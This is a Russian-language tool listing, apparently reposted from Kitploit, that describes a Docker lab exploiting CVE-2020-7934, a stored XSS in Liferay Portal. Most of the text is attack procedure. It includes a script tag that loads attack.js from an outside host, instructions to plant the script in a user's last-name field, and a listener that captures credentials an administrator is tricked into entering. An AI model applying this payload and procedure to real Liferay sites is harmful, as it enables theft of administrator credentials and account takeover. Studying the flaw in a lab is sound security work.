Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!
audit-xss-cve-2020-7934 — Эксплойт XSS на основе Docker для CVE-2020-7934, нацеленный на портал Liferay. Демонстрирует хранимый XSS через поля профиля пользователя для кражи учетных данных администратора. | Kitploit
Эксплойт XSS на основе Docker для CVE-2020-7934, нацеленный на портал Liferay. Демонстрирует хранимый XSS через поля профиля пользователя для кражи учетных данных администратора.
можно разместить скрипт атаки онлайн (учитывая js код) http://yourjavascript.com/
Наш JS скрипт онлайн для атаки
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
Команды для настройки
перейдите в корневую папку этого проекта
выполните "sudo docker-compose up --build"
новый терминал: выполните "docker inspect liferay" ==> и скопируйте значение IPAddress
новый терминал: выполните "python api_attacker.py"
откройте браузер и перейдите по адресу "http://IPAddress:8080" ==> вы должны получить портал liferay в качестве ответа
для остановки и удаления контейнеров используйте "sudo docker-compose rm"
Инструкции для атаки
Зарегистрируйтесь в liferay как пользователь, войдите в систему и в разделе "available sites" присоединитесь к сайту "liferay".
Измените "фамилию" на JS-скрипт (напрямую () или через "src =" http ... "")
Войдите как администратор liferay (имя пользователя: [email protected], пароль: test)
Перейдите в доступные сайты и нажмите на "liferay", откроется публичная страница этого сайта.
Перейдите на новую страницу, справа откроется меню, нажмите на mermbership.
Выберите пользователя, зарегистрированного на шаге 1. В этот момент будет выполнен скрипт.
5.1) В скрипте attack.js страница запросит учетные данные.
В терминале шага 5 (из раздела Команды для настройки) будут выведены имя пользователя/пароль, введенные на шаге 5.1 (администратором) )